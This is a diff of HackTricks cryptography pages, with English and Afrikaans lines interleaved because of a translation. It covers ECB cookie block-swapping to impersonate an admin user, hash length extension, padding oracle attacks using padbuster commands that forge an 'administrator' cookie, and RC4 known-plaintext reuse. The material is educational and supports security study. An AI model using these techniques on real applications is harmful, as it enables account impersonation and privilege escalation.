Now, the attacker just need to discover if the format is `<username><delimiter><password>` or `<password><delimiter><username>`. For doing that, he can just **generate several usernames **with s**imilar and long usernames and passwords until he find the format and the length of the delimiter:**
| Lengte van gebruikersnaam: | Lengte van wagwoord: | Lengte van gebruikersnaam+wagwoord: | Lengte van koekie (na dekodeering): |
| ------------------------- | -------------------- | ----------------------------------- | ----------------------------------- |
| 2 | 2 | 4 | 8 |
| 3 | 3 | 6 | 8 |
| 3 | 4 | 7 | 8 |
| 4 | 4 | 8 | 16 |
| 7 | 7 | 14 | 16 |
| Username length: | Password length: | Username+Password length: | Cookie's length (after decoding): |
| ---------------- | ---------------- | ------------------------- | --------------------------------- |
| 2 | 2 | 4 | 8 |
| 3 | 3 | 6 | 8 |
| 3 | 4 | 7 | 8 |
| 4 | 4 | 8 | 16 |
| 7 | 7 | 14 | 16 |
# Uitbuiting van die kwesbaarheid
# Exploitation of the vulnerability
## Removing entire blocks
Knowing the format of the cookie (`<username>|<password>`), in order to impersonate the username `admin` create a new user called `aaaaaaaaadmin` and get the cookie and decode it:
## Verwydering van hele blokke
Met kennis van die formaat van die koekie (`<gebruikersnaam>|<wagwoord>`), om die gebruikersnaam `admin` na te boots, skep 'n nuwe gebruiker genaamd `aaaaaaaaadmin` en kry die koekie en dekodeer dit:
```
\x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
```
We can see the pattern `\x23U\xE45K\xCB\x21\xC8` created previously with the username that contained only `a`.\
Then, you can remove the first block of 8B and you will et a valid cookie for the username `admin`:
Ons kan die patroon `\x23U\xE45K\xCB\x21\xC8` sien wat vantevore geskep is met die gebruikersnaam wat slegs `a` bevat.\
Daarna kan jy die eerste blok van 8B verwyder en jy sal 'n geldige koekie vir die gebruikersnaam `admin` kry:
```
\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
```
## Blokke skuif
## Moving blocks
In baie databasisse is dit dieselfde om te soek vir `WHERE username='admin';` of vir `WHERE username='admin ';` _(Let op die ekstra spasies)_
In many databases it is the same to search for `WHERE username='admin';` or for `WHERE username='admin ';` _(Note the extra spaces)_
Dus, 'n ander manier om die gebruiker `admin` na te boots, sou wees om:
So, another way to impersonate the user `admin` would be to:
* Genereer 'n gebruikersnaam wat: `len(<username>) + len(<delimiter) % len(block)`. Met 'n blokgrootte van `8B` kan jy 'n gebruikersnaam genaamd `username ` genereer, met die delimiter `|` sal die stuk `<username><delimiter>` 2 blokke van 8Bs genereer.
* Genereer dan 'n wagwoord wat 'n presiese aantal blokke vul wat die gebruikersnaam bevat wat ons wil na boots, en spasies, soos: `admin `
* Generate a username that: `len(<username>) + len(<delimiter) % len(block)`. With a block size of `8B` you can generate username called: `username `, with the delimiter `|` the chunk `<username><delimiter>` will generate 2 blocks of 8Bs.
* Then, generate a password that will fill an exact number of blocks containing the username we want to impersonate and spaces, like: `admin `
Die koekie van hierdie gebruiker sal bestaan uit 3 blokke: die eerste 2 is die blokke van die gebruikersnaam + delimiter en die derde een van die wagwoord (wat die gebruikersnaam naboots): `username |admin `
The cookie of this user is going to be composed by 3 blocks: the first 2 is the blocks of the username + delimiter and the third one of the password (which is faking the username): `username |admin `
**Vervang dan net die eerste blok met die laaste keer en jy boots die gebruiker `admin` na: `admin |username`**
**Then, just replace the first block with the last time and will be impersonating the user `admin`: `admin |username`**
## References
## Verwysings
* [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](http://cryptowiki.net/index.php?title=Electronic_Code_Book_\(ECB\))
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>

72
cryptography/hash-length-extension-attack.md
View file

@ -1,66 +1,62 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
# Summary of the attack
# Opsomming van die aanval
Imagine a server which is **signing** some **data** by **appending** a **secret** to some known clear text data and then hashing that data. If you know:
Stel jou voor 'n bediener wat 'n paar **data** onderteken deur 'n **geheim** by 'n bekende teksdata te **voeg** en dan daardie data te hash. As jy weet:
* **The length of the secret** (this can be also bruteforced from a given length range)
* **The clear text data**
* **The algorithm (and it's vulnerable to this attack)**
* **The padding is known**
* Usually a default one is used, so if the other 3 requirements are met, this also is
* The padding vary depending on the length of the secret+data, that's why the length of the secret is needed
* **Die lengte van die geheim** (dit kan ook gekraak word binne 'n gegewe lengtebereik)
* **Die duidelike teksdata**
* **Die algoritme (en dit is vatbaar vir hierdie aanval)**
* **Die opvulling is bekend**
* Gewoonlik word 'n verstek een gebruik, so as die ander 3 vereistes voldoen word, is dit ook die geval
* Die opvulling varieer afhangende van die lengte van die geheim+data, daarom is die lengte van die geheim nodig
Then, it's possible for an **attacker** to **append** **data** and **generate** a valid **signature** for the **previos data + appended data**.
Dan is dit moontlik vir 'n **aanvaller** om **data** by te voeg en 'n geldige **handtekening** te genereer vir die **vorige data + bygevoegde data**.
## How?
## Hoe?
Basically the vulnerable algorithms generate the hashes by firstly **hashing a block of data**, and then, **from** the **previously** created **hash** (state), they **add the next block of data** and **hash it**.
Basies genereer die vatbare algoritmes die hasings deur eerstens 'n blok data te hash, en dan, **van** die **voorheen** geskep **hash** (toestand), voeg hulle die volgende blok data by en hash dit.
Then, imagine that the secret is "secret" and the data is "data", the MD5 of "secretdata" is 6036708eba0d11f6ef52ad44e8b74d5b.\
If an attacker wants to append the string "append" he can:
Stel jou voor dat die geheim "geheim" is en die data "data" is, die MD5 van "geheimdata" is 6036708eba0d11f6ef52ad44e8b74d5b.\
As 'n aanvaller die string "byvoeg" wil byvoeg, kan hy:
* Generate a MD5 of 64 "A"s
* Change the state of the previously initialized hash to 6036708eba0d11f6ef52ad44e8b74d5b
* Append the string "append"
* Finish the hash and the resulting hash will be a **valid one for "secret" + "data" + "padding" + "append"**
* Genereer 'n MD5 van 64 "A"s
* Verander die toestand van die voorheen geïnisialiseerde hash na 6036708eba0d11f6ef52ad44e8b74d5b
* Voeg die string "byvoeg" by
* Voltooi die hash en die resulterende hash sal 'n **geldige een wees vir "geheim" + "data" + "opvulling" + "byvoeg"**
## **Tool**
## **Hulpmiddel**
{% embed url="https://github.com/iagox86/hash_extender" %}
## References
## Verwysings
You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
Jy kan hierdie aanval goed verduidelik vind by [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>

108
cryptography/padding-oracle-priv.md
View file

@ -1,38 +1,36 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
# CBC - Cipher Block Chaining
In CBC mode the **previous encrypted block is used as IV** to XOR with the next block:
In CBC-modus word die **vorige versleutelde blok as IV** gebruik om te XOR met die volgende blok:
![https://defuse.ca/images/cbc\_encryption.png](https://defuse.ca/images/cbc\_encryption.png)
To decrypt CBC the **opposite** **operations** are done:
Om CBC te ontsluit, word die **teenoorgestelde** **bewerkings** gedoen:
![https://defuse.ca/images/cbc\_decryption.png](https://defuse.ca/images/cbc\_decryption.png)
Notice how it's needed to use an **encryption** **key** and an **IV**.
Let daarop dat 'n **versleutelingsleutel** en 'n **IV** gebruik moet word.
# Message Padding
# Boodskapvulling
As the encryption is performed in **fixed** **size** **blocks**, **padding** is usually needed in the **last** **block** to complete its length.\
Usually **PKCS7** is used, which generates a padding **repeating** the **number** of **bytes** **needed** to **complete** the block. For example, if the last block is missing 3 bytes, the padding will be `\x03\x03\x03`.
Aangesien die versleuteling in **vasgestelde** **blokke** **uitgevoer** word, word **vulling** gewoonlik in die **laaste** **blok** benodig om sy lengte te voltooi.\
Gewoonlik word **PKCS7** gebruik, wat 'n vulling genereer wat die **aantal** **byte** **benodig** om die blok te voltooi, **herhaal**. Byvoorbeeld, as die laaste blok 3 byte kortkom, sal die vulling `\x03\x03\x03` wees.
Let's look at more examples with a **2 blocks of length 8bytes**:
Kom ons kyk na meer voorbeelde met 'n **2 blokke van 8 byte**:
| byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 | byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 |
| ------- | ------- | ------- | ------- | ------- | ------- | ------- | ------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- |
@ -41,51 +39,43 @@ Let's look at more examples with a **2 blocks of length 8bytes**:
| P | A | S | S | W | O | R | D | 1 | 2 | 3 | **0x05** | **0x05** | **0x05** | **0x05** | **0x05** |
| P | A | S | S | W | O | R | D | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** |
Note how in the last example the **last block was full so another one was generated only with padding**.
Let daarop hoe in die laaste voorbeeld die **laaste blok vol was, dus is nog een gegenereer slegs met vulling**.
# Padding Oracle
When an application decrypts encrypted data, it will first decrypt the data; then it will remove the padding. During the cleanup of the padding, if an **invalid padding triggers a detectable behaviour**, you have a **padding oracle vulnerability**. The detectable behaviour can be an **error**, a **lack of results**, or a **slower response**.
Wanneer 'n toepassing versleutelde data ontsluit, sal dit eers die data ontsluit; dan sal dit die vulling verwyder. Tydens die skoonmaak van die vulling, as 'n **ongeldige vulling 'n waarneembare gedrag teweegbring**, het jy 'n **padding-orakel kwesbaarheid**. Die waarneembare gedrag kan 'n **fout**, 'n **gebrek aan resultate**, of 'n **stadiger reaksie** wees.
If you detect this behaviour, you can **decrypt the encrypted data** and even **encrypt any cleartext**.
As jy hierdie gedrag opspoor, kan jy die **versleutelde data ontsluit** en selfs **enige duidelike teks versleutel**.
## How to exploit
You could use [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) to exploit this kind of vulnerability or just do
## Hoe om uit te buit
Jy kan [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) gebruik om hierdie tipe kwesbaarheid uit te buit of net die volgende doen
```
sudo apt-get install padbuster
```
In order to test if the cookie of a site is vulnerable you could try:
Om te toets of die koekie van 'n webwerf kwesbaar is, kan jy probeer:
```bash
perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA=="
```
**Kodering 0** beteken dat **base64** gebruik word (maar ander is beskikbaar, kyk na die hulpmenu).
**Encoding 0** means that **base64** is used (but others are available, check the help menu).
You could also **abuse this vulnerability to encrypt new data. For example, imagine that the content of the cookie is "**_**user=MyUsername**_**", then you may change it to "\_user=administrator\_" and escalate privileges inside the application. You could also do it using `paduster`specifying the -plaintext** parameter:
Jy kan ook **misbruik maak van hierdie kwesbaarheid om nuwe data te enkripteer. Byvoorbeeld, stel jou voor dat die inhoud van die koekie is "**_**gebruiker=MyGebruikersnaam**_**", dan kan jy dit verander na "\_gebruiker=administrateur\_" en voorregte binne die toepassing verhoog. Jy kan dit ook doen deur `paduster` te gebruik en die -plaintext** parameter te spesifiseer:
```bash
perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" -plaintext "user=administrator"
```
If the site is vulnerable `padbuster`will automatically try to find when the padding error occurs, but you can also indicating the error message it using the **-error** parameter.
As die webwerf kwesbaar is, sal `padbuster` outomaties probeer om te vind wanneer die padding-fout plaasvind, maar jy kan ook die foutboodskap aandui deur die **-error** parameter te gebruik.
```bash
perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon=RVJDQrwUdTRWJUVUeBKkEA==" -error "Invalid padding"
```
## Die teorie
## The theory
In **summary**, you can start decrypting the encrypted data by guessing the correct values that can be used to create all the **different paddings**. Then, the padding oracle attack will start decrypting bytes from the end to the start by guessing which will be the correct value that **creates a padding of 1, 2, 3, etc**.
In **opsomming**, jy kan begin om die versleutelde data te ontsluit deur die regte waardes te raai wat gebruik kan word om al die **verskillende opvullings** te skep. Dan sal die padding-orakelaanval begin om byte van die einde na die begin te ontsluit deur te raai watter die regte waarde sal wees wat **'n opvulling van 1, 2, 3, ens. skep**.
![](<../.gitbook/assets/image (629) (1) (1).png>)
Imagine you have some encrypted text that occupies **2 blocks** formed by the bytes from **E0 to E15**.\
In order to **decrypt** the **last** **block** (**E8** to **E15**), the whole block passes through the "block cipher decryption" generating the **intermediary bytes I0 to I15**.\
Finally, each intermediary byte is **XORed** with the previous encrypted bytes (E0 to E7). So:
Stel jou voor jy het 'n paar versleutelde teks wat **2 blokke** beslaan, gevorm deur die bytes van **E0 tot E15**.\
Om die **laaste blok** (**E8** tot **E15**) te **ontsluit**, gaan die hele blok deur die "blok-sifer ontsluiting" wat die **tussengangerbyte I0 tot I15** genereer.\
Uiteindelik word elke tussengangerbyte **XORed** met die vorige versleutelde bytes (E0 tot E7). So:
* `C15 = D(E15) ^ E7 = I15 ^ E7`
* `C14 = I14 ^ E6`
@ -93,44 +83,42 @@ Finally, each intermediary byte is **XORed** with the previous encrypted bytes (
* `C12 = I12 ^ E4`
* ...
Now, It's possible to **modify `E7` until `C15` is `0x01`**, which will also be a correct padding. So, in this case: `\x01 = I15 ^ E'7`
Nou is dit moontlik om **`E7` te wysig totdat `C15` `0x01` is**, wat ook 'n korrekte opvulling sal wees. Dus, in hierdie geval: `\x01 = I15 ^ E'7`
So, finding E'7, it's **possible to calculate I15**: `I15 = 0x01 ^ E'7`
Dus, deur E'7 te vind, is dit **moontlik om I15 te bereken**: `I15 = 0x01 ^ E'7`
Which allow us to **calculate C15**: `C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7`
Dit stel ons in staat om **C15 te bereken**: `C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7`
Knowing **C15**, now it's possible to **calculate C14**, but this time brute-forcing the padding `\x02\x02`.
Wetende **C15**, is dit nou moontlik om **C14 te bereken**, maar hierdie keer deur die opvulling `\x02\x02` te kragtig te raai.
This BF is as complex as the previous one as it's possible to calculate the the `E''15` whose value is 0x02: `E''7 = \x02 ^ I15` so it's just needed to find the **`E'14`** that generates a **`C14` equals to `0x02`**.\
Then, do the same steps to decrypt C14: **`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`**
Hierdie BF is net so ingewikkeld as die vorige een, omdat dit moontlik is om die `E''15` te bereken, waarvan die waarde 0x02 is: `E''7 = \x02 ^ I15` dus hoef jy net die **`E'14`** te vind wat 'n **`C14` gelyk aan `0x02`** genereer.\
Doen dan dieselfde stappe om C14 te ontsluit: **`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`**
**Follow this chain until you decrypt the whole encrypted text.**
**Volg hierdie ketting totdat jy die hele versleutelde teks ontsluit.**
## Detection of the vulnerability
## Opmerking van die kwesbaarheid
Register and account and log in with this account .\
If you **log in many times** and always get the **same cookie**, there is probably **something** **wrong** in the application. The **cookie sent back should be unique** each time you log in. If the cookie is **always** the **same**, it will probably always be valid and there **won't be anyway to invalidate i**t.
Registreer en rekeninge en teken in met hierdie rekening.\
As jy **baie keer teken** en altyd dieselfde koekie kry, is daar waarskynlik **iets fout** in die toepassing. Die koekie wat teruggestuur word, moet elke keer wat jy teken, uniek wees. As die koekie **altyd** dieselfde is, sal dit waarskynlik altyd geldig wees en sal daar **geen manier wees om dit ongeldig te maak nie**.
Now, if you try to **modify** the **cookie**, you can see that you get an **error** from the application.\
But if you BF the padding (using padbuster for example) you manage to get another cookie valid for a different user. This scenario is highly probably vulnerable to padbuster.
Nou, as jy probeer om die **koekie te wysig**, kan jy sien dat jy 'n **fout** van die toepassing kry.\
Maar as jy die opvulling BF (deur byvoorbeeld padbuster te gebruik), slaag jy daarin om 'n ander koekie te kry wat geldig is vir 'n ander gebruiker. Hierdie scenario is baie waarskynlik kwesbaar vir padbuster.
## References
## Verwysings
* [https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation](https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks-klere**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>

36
cryptography/rc4-encrypt-and-decrypt.md
View file

@ -1,23 +1,21 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
If you can somehow encrypt a plaintext using RC4, you can decrypt any content encrypted by that RC4 (using the same password) just using the encryption function.
As jy op een of ander manier 'n platte teks kan enkripteer met RC4, kan jy enige inhoud wat deur daardie RC4 enkripteer is (met dieselfde wagwoord) dekripteer deur net die enkripsiefunksie te gebruik.
If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine:
As jy 'n bekende platte teks kan enkripteer, kan jy ook die wagwoord onttrek. Meer verwysings kan gevind word in die HTB Kryptos-masjien:
{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %}
@ -29,16 +27,14 @@ If you can encrypt a known plaintext you can also extract the password. More ref
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
